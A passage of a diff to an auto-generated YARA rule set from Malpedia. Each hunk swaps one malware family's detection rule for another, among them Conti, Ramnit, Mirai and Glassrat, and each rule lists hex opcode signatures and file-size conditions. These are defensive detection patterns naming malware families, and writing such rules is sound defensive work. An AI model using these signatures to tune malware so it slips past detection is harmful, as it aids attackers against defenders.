$sequence_0 = { 89442420 488bcf ff15???????? 85c0 } - $sequence_1 = { 488bcf ff15???????? 498bce ff15???????? 488bce } - $sequence_2 = { 488bb424f00d0000 488b8dd00c0000 4833cc e8???????? 4881c4f80d0000 } - $sequence_3 = { 0f8559ffffff 488bcf ff15???????? 498bce ff15???????? 488bce ff15???????? } - $sequence_4 = { 498784f180bf0100 eb25 488bc3 498784f180bf0100 4885c0 } - $sequence_5 = { 4d8be1 498be8 4c8bea 4b8b8cf7e0c70100 4c8b15???????? } - $sequence_6 = { 33db 33ff 4c8bea 4c8be1 4883fa40 7312 } - $sequence_7 = { f30f6f0418 660fefc1 f30f7f0418 8d4210 83c220 f30f6f0418 660fefc1 } - $sequence_8 = { 0f8559ffffff 488bcf ff15???????? 498bce } - $sequence_9 = { e8???????? 85c0 0f85c6000000 448b442468 } + $sequence_0 = { e8???????? 8d4da4 c645fc12 e8???????? 84db 0f84ca020000 6a40 } + $sequence_1 = { 0f8415000000 81a53cffffffffbfffff 8d8da8feffff e9???????? c3 8d8d60feffff e9???????? } + $sequence_2 = { 8d8c2468010000 e8???????? 6a0d e8???????? 59 56 8bd0 } + $sequence_3 = { 6bc838 57 8b0495201e4900 8a440828 a848 757b 84c0 } + $sequence_4 = { 8d4dbc e8???????? 8d4dd4 e8???????? 8bc3 e8???????? c20c00 } + $sequence_5 = { b8???????? e8???????? 8bf9 8db78c000000 8bce e8???????? 84c0 } + $sequence_6 = { 53 50 e8???????? 83c40c 8d8db8feffff e8???????? 8d95b8feffff } + $sequence_7 = { 53 68???????? 50 ff5110 ff758c ffd6 50 } + $sequence_8 = { 0f85d3000000 8d45e8 50 8b06 8b08 83c128 } + $sequence_9 = { 84c0 750e 8d45d8 50 8d4e6c e8???????? eb49 } condition: - 7 of them and filesize <270336 + 7 of them and filesize <1400832 } -rule MALPEDIA_Win_Pss_Auto : FILE +rule MALPEDIA_Win_Glassrat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c85e1f97-adb5-5a29-88aa-4e9dab9b1814" + id = "daeaa019-8217-55aa-beac-5fb62572b79c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pss" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pss_auto.yar#L1-L136" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.glassrat_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "3fa2b0cf1b29b7abf02331e25c131d124a839f7a317f2ebb6c59c1c9547e53c0" + logic_hash = "c91259f84ec94eec4bc87c666b3c91ba45af3572c135cc4f200070d560141e5d" score = 75 quality = 75 tags = "FILE" @@ -175631,35 +178313,32 @@ rule MALPEDIA_Win_Pss_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d48fe e8???????? e9???????? 83f811 } - $sequence_1 = { 7437 ff15???????? 3de5030000 752a } - $sequence_2 = { ff15???????? 83ceff 3bc6 7504 } - $sequence_3 = { 5e 5b 0f42ca 85c0 0f45c8 } - $sequence_4 = { 0fb619 0fb6c0 eb17 81fb00010000 7313 8a87a4f10110 } - $sequence_5 = { 8d542418 8bce e8???????? 59 59 } - $sequence_6 = { 8bf9 46 85ff 744f 833fff 7410 ff37 } - $sequence_7 = { 0fb6c0 5f 5e 5b c9 } - $sequence_8 = { 488d4c2428 e8???????? 90 4c8d05b3b70000 488bd0 488d0db1610100 } - $sequence_9 = { ff15???????? b001 eb25 e8???????? } - $sequence_10 = { e8???????? 90 4c8d05d3b50000 488bd0 } - $sequence_11 = { 488bcb e8???????? e9???????? ba80000000 488bcb } - $sequence_12 = { 488b4de7 e8???????? 48c745ff07000000 48897df7 } + $sequence_0 = { 8d542438 83c9ff 33c0 f2ae f7d1 2bf9 8bc1 } + $sequence_1 = { ff15???????? 33c0 8b5504 8944241d 8d4c241c } + $sequence_2 = { 747a 3bfe 7476 56 56 56 53 } + $sequence_3 = { 895db8 895dbc ff15???????? 85c0 0f84bb000000 } + $sequence_4 = { 3bc8 b802000000 0f85b4000000 33d2 b909020000 52 83ec10 } + $sequence_5 = { 6a04 51 52 8844243b } + $sequence_6 = { 8b460c 53 53 57 50 } + $sequence_7 = { 8bce ff12 57 ff15???????? 8d4c2420 } + $sequence_8 = { 89442418 ff15???????? 8b4d04 8b1d???????? } + $sequence_9 = { 89442408 89542404 8a15???????? 33c0 } condition: - 7 of them and filesize <421888 + 7 of them and filesize <81920 } -rule MALPEDIA_Win_Gup_Proxy_Auto : FILE +rule MALPEDIA_Win_Bitsran_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5c3bfea3-920f-5316-9eb6-180474d2cca9" + id = "e3cfbc68-7ec2-5ca7-89d3-b794638917c8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gup_proxy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gup_proxy_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bitsran_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "d81f0061756179ec05e7cc548d81d0721d972a5a55f0d637cdd705d25b38ea90" + logic_hash = "2919e184e2a9722abe679cf353ecc217eb2b7fdd010f4e63772073cd0ac5e798" score = 75 quality = 75 tags = "FILE" @@ -175673,34 +178352,34 @@ rule MALPEDIA_Win_Gup_Proxy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c744244400000000 c644243400 e8???????? c784242002000000000000 8d4c2444 6a00 } - $sequence_1 = { c1e606 03348510974100 33db 395e08 } - $sequence_2 = { 8b04bd10974100 830c06ff 33c0 eb16 e8???????? c70009000000 } - $sequence_3 = { c1f805 c1e606 8b048510974100 80643004fd 8b45f8 8b55fc 5f } - $sequence_4 = { c78588feffffc22eab48 50 8bce e8???????? 8bc3 889d88feffff c1e818 } - $sequence_5 = { c3 b8???????? c705????????61984000 a3???????? c705????????f2984000 c705????????4c994000 c705????????d1994000 } - $sequence_6 = { c784242002000000000000 8d4c2444 6a00 68???????? c74424600f000000 c744245c00000000 c644244c00 } - $sequence_7 = { ebb4 c745e4d8a04100 a1???????? eb1a c745e4d4a04100 a1???????? } - $sequence_8 = { ff15???????? 8b04bd10974100 830c06ff 33c0 } - $sequence_9 = { 53 ff15???????? 83f8ff 752a 32c0 } + $sequence_0 = { 85c0 7433 56 57 8bbdf8bfffff c1ef02 } + $sequence_1 = { 8911 8b0d???????? 8b9d58fdffff eb5e 8b35???????? } + $sequence_2 = { 85f6 7417 8b4508 50 } + $sequence_3 = { 50 53 e8???????? 8b9d44fdffff 83ef04 } + $sequence_4 = { 83c408 85c0 7403 8975fc 8b03 8d55b8 52 } + $sequence_5 = { 742b 8bc1 2bc1 c1f802 8d348500000000 } + $sequence_6 = { 8b04c5046f4100 5d c3 8bff } + $sequence_7 = { 8d95d4fbffff 52 53 ff15???????? 837d1401 7407 } + $sequence_8 = { 2bc3 c1f802 3dfeffff3f 0f87d0010000 8bca 2bcb } + $sequence_9 = { 899d58fdffff 3bd9 0f83fe000000 3bd3 0f87f6000000 8b35???????? 2bda } condition: - 7 of them and filesize <247808 + 7 of them and filesize <344064 } -rule MALPEDIA_Win_Webc2_Kt3_Auto : FILE +rule MALPEDIA_Win_Conti_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "94855d65-b1ce-5b35-9456-d0939a525276" + id = "aae9ecae-21cf-5ec8-8511-8157ca36f115" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_kt3_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.conti" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.conti_auto.yar#L1-L225" license_url = "N/A" - logic_hash = "a5c2b8d7a42ef74a9adf1d4cae6732c8a660cac1ccf5f008908f03c7dfba3cd1" + logic_hash = "0be9a10d7e2a11f01ccc516eb831064a902454185cea8a72f6170734199b0c59" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -175712,32 +178391,46 @@ rule MALPEDIA_Win_Webc2_Kt3_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8a92c0c84000 089021d34000 40 3bc7 76f5 41 } - $sequence_1 = { ff15???????? 85c0 0f843a010000 83bdf0fbffff00 0f86a4000000 } - $sequence_2 = { 836dd001 837dd000 742c 836dd001 } - $sequence_3 = { 0345f8 c60000 8b4de8 51 ff15???????? 8b55e8 0fbe02 } - $sequence_4 = { 8955a8 66c745c80000 c745cc00000000 66c745ca0000 c745c401010000 8b4508 8945d0 } - $sequence_5 = { e8???????? 8945fc 837dfc00 7d05 83c8ff eb25 837dfc00 } - $sequence_6 = { 7527 8b55fc 0fbe4202 83f82d 751b } - $sequence_7 = { 51 ff15???????? 8945f0 837df000 7511 8b55f8 52 } - $sequence_8 = { 8b5508 83c234 83c9ff 33c0 } - $sequence_9 = { 8bec 83ec30 53 56 57 8b4508 8945e0 } + $sequence_0 = { 56 57 bf0e000000 8d7101 } + $sequence_1 = { 8d7f01 0fb6c0 b978000000 2bc8 } + $sequence_2 = { 57 bf0a000000 8d7101 8d5f75 8a06 8d7601 0fb6c0 } + $sequence_3 = { 8d7f01 0fb6c0 b96c000000 2bc8 } + $sequence_4 = { 0f1f4000 8a07 8d7f01 0fb6c0 b948000000 } + $sequence_5 = { 8975fc 803e00 7541 53 bb0a000000 } + $sequence_6 = { 8975fc 803e00 7542 53 bb0e000000 } + $sequence_7 = { 8d7f01 0fb6c0 b909000000 2bc8 } + $sequence_8 = { e8???????? 8bb6007d0000 85f6 75ef 6aff } + $sequence_9 = { 50 6a20 ff15???????? 68???????? ff15???????? 68???????? } + $sequence_10 = { 780e 7f07 3d00005000 7605 } + $sequence_11 = { 8bec 8b4d08 e8???????? 6a00 ff15???????? } + $sequence_12 = { 50 8b4508 ff7004 ff15???????? 85c0 7508 6a01 } + $sequence_13 = { 6810660000 ff7508 ff15???????? 85c0 } + $sequence_14 = { 85ff 7408 57 56 ff15???????? ff75f8 56 } + $sequence_15 = { 7411 a801 740d 83f001 50 ff7608 } + $sequence_16 = { 48894c2430 4c8d45ff 488d4d0f 418bd6 48894c2428 488d4d07 48894c2420 } + $sequence_17 = { 42884c0500 49ffc0 4983f80d 72af 44884d0f } + $sequence_18 = { 33d2 ffd0 897c2450 b856555555 } + $sequence_19 = { 0fb64500 0fb645ff 84c0 755c } + $sequence_20 = { 488b4f30 488b4738 4885c9 7406 } + $sequence_21 = { 48894c2448 488d55e0 488d4c2470 4533c0 } + $sequence_22 = { 42884c0501 49ffc0 4983f80c 72af } + $sequence_23 = { 41b801000000 488bd3 8bcf ffd0 4d85f6 } condition: - 7 of them and filesize <114688 + 7 of them and filesize <520192 } -rule MALPEDIA_Win_Cur1_Downloader_Auto : FILE +rule MALPEDIA_Win_Carrotball_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2c8bb8d3-c4a4-59f1-99cf-04925e102b6b" + id = "8d1dffb9-f801-5b51-998b-8e4431af5d29" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cur1_downloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cur1_downloader_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotball" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.carrotball_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "b5443d6c58a9050bf16869865e319c3a21a1ce3b38679342db8dce71a1fd94bc" + logic_hash = "8cb2e3b01c31931d0c5f23b61551aa799de8dd787a3493373f0ac01ba6f109d9" score = 75 quality = 75 tags = "FILE" @@ -175751,34 +178444,34 @@ rule MALPEDIA_Win_Cur1_Downloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? ebd1 488d542440 488b4c2470 e8???????? 8b442438 83c801 } - $sequence_1 = { 8b442440 ffc0 89442440 8b05???????? 39442440 0f83e4000000 8b442440 } - $sequence_2 = { c68424e70200006f c68424e80200006e c68424e902000057 c68424ea02000000 } - $sequence_3 = { 7578 48630d847affff 488d15417affff 4803ca 813950450000 755f b80b020000 } - $sequence_4 = { c68424b803000069 c68424b90300006e c68424ba03000067 c68424bb0300006c c68424bc03000065 c68424bd0300004f } - $sequence_5 = { c684248803000065 c684248903000049 c684248a0300006e c684248b03000066 c684248c0300006f c684248d03000072 c684248e0300006d } - $sequence_6 = { 48c744247000000000 41b918000000 4c8d8424a0000000 488b942488000000 488b8c2490000000 ff15???????? 85c0 } - $sequence_7 = { 4863442450 0fb78444d0000000 83f85c 750d 8b442450 898424a4000000 eb02 } - $sequence_8 = { 7d0c 4863442428 c644042400 ebe3 c744242800000000 eb0a 8b442428 } - $sequence_9 = { c644244933 c644244a37 c644244b62 c644244c34 c644244d37 c644244e39 c644244f32 } + $sequence_0 = { ff15???????? eb36 68???????? 56 ff15???????? } + $sequence_1 = { 6a04 58 6bc000 c7807430001002000000 6a04 } + $sequence_2 = { 5f 8b4dfc 33cd 33c0 e8???????? 8be5 5d } + $sequence_3 = { ffd6 5e 5f 8b4dfc 33cd 33c0 } + $sequence_4 = { 68???????? ff15???????? eb36 68???????? 56 } + $sequence_5 = { 8bf0 85f6 0f84ac000000 68???????? } + $sequence_6 = { 56 ff15???????? 85c0 7432 8d85ecfdffff } + $sequence_7 = { ff15???????? 8bf8 85ff 0f84d9000000 56 } + $sequence_8 = { ff15???????? 8bf0 85f6 0f84ac000000 68???????? 56 ff15???????? } + $sequence_9 = { 6bc000 c7807430001002000000 6a04 58 6bc000 } condition: - 7 of them and filesize <402432 + 7 of them and filesize <40960 } -rule MALPEDIA_Win_Infy_Auto : FILE +rule MALPEDIA_Win_Computrace_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "57c24fda-e429-5a88-80d2-235251d4052e" + id = "4429b6f7-4609-5864-be9b-bd86b296052a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.infy_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.computrace_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "97f3b09f4f39ef998f79ec8093433c607a41cb99a12ab0573691bf5dec73bf57" - score = 60 - quality = 45 + logic_hash = "d8751f69a58562c91660e3060ff3b6e112f846c07b191aab11a4034542037b61" + score = 75 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -175790,34 +178483,34 @@ rule MALPEDIA_Win_Infy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7e24 8945d4 807de300 7409 8b45e4 66833820 } - $sequence_1 = { 7409 8b13 8bc3 e8???????? 85c0 7405 83e804 } - $sequence_2 = { 57 33c9 894df8 8955f0 } - $sequence_3 = { 7553 837e1400 7442 837e1c00 } - $sequence_4 = { 668378f602 7412 6a00 89e0 } - $sequence_5 = { 68???????? 8d45c8 ba09000000 e8???????? 8d45ec } - $sequence_6 = { 807de300 7409 8b45e4 66833820 7304 33c0 eb02 } - $sequence_7 = { c1e002 034610 f6400380 0f94c2 83e201 8955e0 85d2 } - $sequence_8 = { e8???????? 8bd0 81e2ff000000 2500ff0000 c1e808 83fa05 7505 } - $sequence_9 = { e8???????? 83c40c 5b 5d c20800 55 8bec } + $sequence_0 = { ff75cc e8???????? 3975e4 753a } + $sequence_1 = { e8???????? 8a4002 8b0d???????? 8801 ff35???????? } + $sequence_2 = { 740e 837de400 7408 037de4 897dd8 eba6 8b4514 } + $sequence_3 = { 7503 800e08 e8???????? 894604 ff750c 8f4618 } + $sequence_4 = { e30d 83c00a 51 ff750c 50 e8???????? } + $sequence_5 = { e8???????? 837de400 0f8593feffff 8b86481b0000 83786c00 0f8483feffff } + $sequence_6 = { 8b7508 80665cfe 33c0 8945fc 8845fb 6689461a 48 } + $sequence_7 = { 7414 c745dc01000000 897d8c 6af1 } + $sequence_8 = { e8???????? 8945e4 3bc6 7417 } + $sequence_9 = { ff15???????? f7d8 1bc0 40 57 } condition: - 7 of them and filesize <147456 + 7 of them and filesize <73728 } -rule MALPEDIA_Win_Suppobox_Auto : FILE +rule MALPEDIA_Win_Dma_Locker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4c561dbc-9b95-52c8-b1b6-738a8e400b62" + id = "a8f397b8-8b2b-5241-983c-0be688886121" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.suppobox_auto.yar#L1-L194" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dma_locker_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "33ed4ed4c3c8a05bca33fadb06a60aef627f5ee4031100bb5102db6965fc9d6b" + logic_hash = "b77f5ca2d335c463d6c2790ec00b5fbc00e6cee8478dbf10e4d2132a598117f8" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -175829,44 +178522,32 @@ rule MALPEDIA_Win_Suppobox_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7d10 a1???????? 0b05???????? a3???????? } - $sequence_1 = { 7f10 a1???????? 2305???????? a3???????? } - $sequence_2 = { 8945f0 a1???????? 83e801 a3???????? } - $sequence_3 = { 7e10 a1???????? 0305???????? a3???????? } - $sequence_4 = { 890d???????? e8???????? 8bf0 e8???????? 03f0 } - $sequence_5 = { 7d10 a1???????? 3305???????? a3???????? } - $sequence_6 = { 3bc8 7d10 a1???????? 2b05???????? a3???????? } - $sequence_7 = { 01bdacf7ffff 83c40c 83bdc8f7ffff00 8b95c8f7ffff } - $sequence_8 = { 8d45f3 83ec04 890424 e8???????? } - $sequence_9 = { 8d45f3 890424 e8???????? 52 ebc5 } - $sequence_10 = { 8d45f4 89442408 e9???????? 8b4508 } - $sequence_11 = { 01c6 39fe 0f8d7e010000 80bc2ef4f7ffff0a } - $sequence_12 = { 8d45f2 89f1 89442404 c70424???????? } - $sequence_13 = { 01d8 3b85b0f7ffff 7e2f 8b95c8f7ffff } - $sequence_14 = { 8d45f2 89442404 8b4508 890424 e8???????? 83ec08 } - $sequence_15 = { 8d45ef 89d9 890424 e8???????? 51 } - $sequence_16 = { 01d7 68???????? 57 e8???????? } - $sequence_17 = { 01c6 ebdb ff7510 57 } - $sequence_18 = { 01c9 4a 79f2 833b54 } - $sequence_19 = { 8d45f4 89442408 c744240401000000 893424 } - $sequence_20 = { 01c6 39fe 0f8d2f020000 80bc2ef4f7ffff0a } - $sequence_21 = { 019dacf7ffff 83c40c 299dc4f7ffff e9???????? } + $sequence_0 = { e8???????? 8bf0 eb02 33f6 6803010000 8d8c24a1040000 } + $sequence_1 = { 57 56 e8???????? 83c40c 84db } + $sequence_2 = { 8bc7 e8???????? 84c0 741f 8b4f10 8b13 57 } + $sequence_3 = { 8a5dfd 32ca 8a55fc 32cb 8848ff 8aca } + $sequence_4 = { 8b5e04 8b0e 8945ec 8b55ec } + $sequence_5 = { ffd7 85c0 7fe3 5f } + $sequence_6 = { e8???????? 8b442420 8b00 83c40c 8d4c2424 51 } + $sequence_7 = { 52 ff15???????? a1???????? 6a00 50 ff15???????? e9???????? } + $sequence_8 = { 7545 68???????? e8???????? 8b95b0f6ffff 83c404 52 ff15???????? } + $sequence_9 = { 385e14 0f85e8000000 8b4618 83f8ff 7407 50 ff15???????? } condition: - 7 of them and filesize <1875968 + 7 of them and filesize <532480 } -rule MALPEDIA_Win_Unidentified_098_Auto : FILE +rule MALPEDIA_Win_Ramnit_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8f47cad5-b04b-526a-bf75-a80f46978296" + id = "9f7bb136-c877-5703-86ba-5c3c0993dd1e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_098" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_098_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ramnit_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "5873ddf57107eab8629c385b87e703377b84a728d15aa8f227623b130059db6e" + logic_hash = "a743fa525eb529644f7aae0eeccbdf2bcc4af05febdbf59986022c9547272ab4" score = 75 quality = 75 tags = "FILE" @@ -175880,32 +178561,32 @@ rule MALPEDIA_Win_Unidentified_098_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c644247f00 e9???????? 41bdffffffff 4885db 7412 488b4310 483b4318 } - $sequence_1 = { e9???????? 8d48bf 83f905 0f8716ffffff 83e837 c1e00c 89c6 } - $sequence_2 = { 7eac 85c0 78a8 488b4318 31d2 4885c0 75ab } - $sequence_3 = { f6c202 410f45c0 4883c102 01d2 668941fe 4939c9 75ce } - $sequence_4 = { b801000000 4d85c0 7486 488b542450 4c89e1 e8???????? 85c0 } - $sequence_5 = { ff15???????? 410fb61424 e9???????? 4c89f8 4829d8 4801c7 4d85ed } - $sequence_6 = { 85d2 0f88d5000000 4c8d5904 4189d2 4c8d4910 83fa0f 7e33 } - $sequence_7 = { 488d542440 4939d4 7411 4c89e1 8844242f e8???????? 0fb644242f } - $sequence_8 = { 897c2450 41bd01000000 44894c2434 4889442458 e9???????? 488b03 4489442434 } - $sequence_9 = { e9???????? 498b4610 493b4618 0f838d010000 0fb700 6683f8ff b900000000 } + $sequence_0 = { 3a06 7512 47 46 e2f6 b801000000 59 } + $sequence_1 = { 750b 4f 3b7d08 73e7 bf00000000 } + $sequence_2 = { 57 56 fc 807d1401 } + $sequence_3 = { 5f 59 5a 5b c9 c20800 55 } + $sequence_4 = { ff750c ff75fc e8???????? 0bc0 7429 } + $sequence_5 = { 8bc7 5a 5b 59 5f } + $sequence_6 = { 8bc1 f7d0 48 59 5f 5e } + $sequence_7 = { f3a4 fc 5e 5f 59 5a } + $sequence_8 = { 8bd7 2b5508 59 5f 5e } + $sequence_9 = { 8b5d0c 4b f7d3 23c3 } condition: - 7 of them and filesize <3345408 + 7 of them and filesize <470016 } -rule MALPEDIA_Win_Tarsip_Auto : FILE +rule MALPEDIA_Win_Unidentified_045_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4ad2adc0-f292-5e9b-b3e6-4bd61bcff987" + id = "a8bfd3f0-95b3-5af9-8c6f-fa63b3ef83b3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tarsip_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_045_auto.yar#L1-L104" license_url = "N/A" - logic_hash = "228c42e725c96bb3ed688957a36bb59d0b21035a6d52aae02eb400f7262ce8f7" + logic_hash = "16726755d5995c8139758648ed741d294bd49338a51b6fd2af1cb4cf9c59e23f" score = 75 quality = 75 tags = "FILE" @@ -175919,32 +178600,30 @@ rule MALPEDIA_Win_Tarsip_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8884244f840000 e8???????? 8d94240c840000 52 } - $sequence_1 = { ff15???????? 89ae14420100 8b8610420100 3bc5 } - $sequence_2 = { ff15???????? 898614420100 85c0 754f } - $sequence_3 = { 80fa2f 7505 b83f000000 8d148500000000 8b442420 c1fa02 c1e106 } - $sequence_4 = { ff15???????? 5b 33c0 5e c3 57 6a00 } - $sequence_5 = { 8b08 038ea4830000 8b54240c 8a02 8801 } - $sequence_6 = { e8???????? 50 e8???????? e8???????? 99 b980841e00 } - $sequence_7 = { e8???????? 83c404 c746180f000000 895e14 885e04 8b4c240c 64890d00000000 } - $sequence_8 = { 8b442418 0374241c 53 8d542418 52 53 53 } - $sequence_9 = { 83bc240c01000010 7210 8b9424f8000000 52 e8???????? 83c404 c784240c0100000f000000 } + $sequence_0 = { 50 e8???????? 83c40c 68???????? 68???????? 68???????? e8???????? } + $sequence_1 = { 8930 8935???????? eb2b 837d0c02 7528 8b35???????? } + $sequence_2 = { 8bc7 eb5c 33f6 85f6 7609 } + $sequence_3 = { 6804010000 8d44244c 57 50 e8???????? 8b35???????? } + $sequence_4 = { ff15???????? 33f6 56 56 6a02 56 56 } + $sequence_5 = { 6a01 56 56 ff7508 897dac 56 } + $sequence_6 = { 3345fc 5e c9 c3 803d????????00 } + $sequence_7 = { 6a0c 50 57 8975f4 } condition: - 7 of them and filesize <360448 + 7 of them and filesize <73728 } -rule MALPEDIA_Elf_Mirai_Auto : FILE +rule MALPEDIA_Win_Funny_Dream_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "99bf67bb-d881-5d1d-9ccf-8805d4c126fc" + id = "342150e9-e685-51fd-bb6e-825e56ff33ab" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/elf.mirai_auto.yar#L1-L92" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.funny_dream" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.funny_dream_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "53d684afadf5b7afddedfe71964fc5273146fef2945717259a3274aa2e1d04ee" + logic_hash = "93298c694e8a0e9daec0c22ddb9409f4c4088b474ade93c3bf4d76bcd798f980" score = 75 quality = 75 tags = "FILE" @@ -175958,30 +178637,32 @@ rule MALPEDIA_Elf_Mirai_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6689432a e8???????? c7433400000000 894330 } - $sequence_1 = { 89d0 c1e005 01d0 89ca } - $sequence_2 = { 894330 c6433801 c6433903 c6433a03 c6433b06 } - $sequence_3 = { 66c1e808 d0e8 8d04c0 28c2 } - $sequence_4 = { 3c19 7705 8d42e0 8801 } - $sequence_5 = { 807c242b00 66894304 7406 66c743064000 c643092f } - $sequence_6 = { 66894104 7406 66c741064000 c6410911 } - $sequence_7 = { 8b1408 895310 8b54080c 66895314 } + $sequence_0 = { c785e0ddffff01000000 50 6880000000 68ffff0000 ffb3c0000000 } + $sequence_1 = { 6a00 ff7728 ffd6 6a00 ff7724 ff15???????? 8b4714 } + $sequence_2 = { c745d45368656c 50 53 c745d86c457865 c745dc63757465 66c745e04100 } + $sequence_3 = { 85c0 0f8494000000 33c9 8a840d3cffffff } + $sequence_4 = { ff15???????? 85c0 0f85e7feffff 8d4704 899da0fdffff } + $sequence_5 = { 6a00 6800040000 8d842458030000 50 } + $sequence_6 = { 50 57 ff15???????? 85c0 7523 8b4618 8b3d???????? } + $sequence_7 = { 50 ff15???????? 8d442408 c744240810000000 50 8d442414 0f57c0 } + $sequence_8 = { 85c0 0f84f8000000 68???????? 50 ff15???????? } + $sequence_9 = { 83c404 8b4f04 85c9 7504 33c0 eb05 8b4708 } condition: - 7 of them and filesize <2228224 + 7 of them and filesize <393216 } -rule MALPEDIA_Win_Chainshot_Auto : FILE +rule MALPEDIA_Win_Gopuram_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "beaf03a9-9558-5280-a84b-64277bd4ffc2" + id = "886a3e56-99e6-5544-870d-cee2f3bf23a6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot" - source_url = 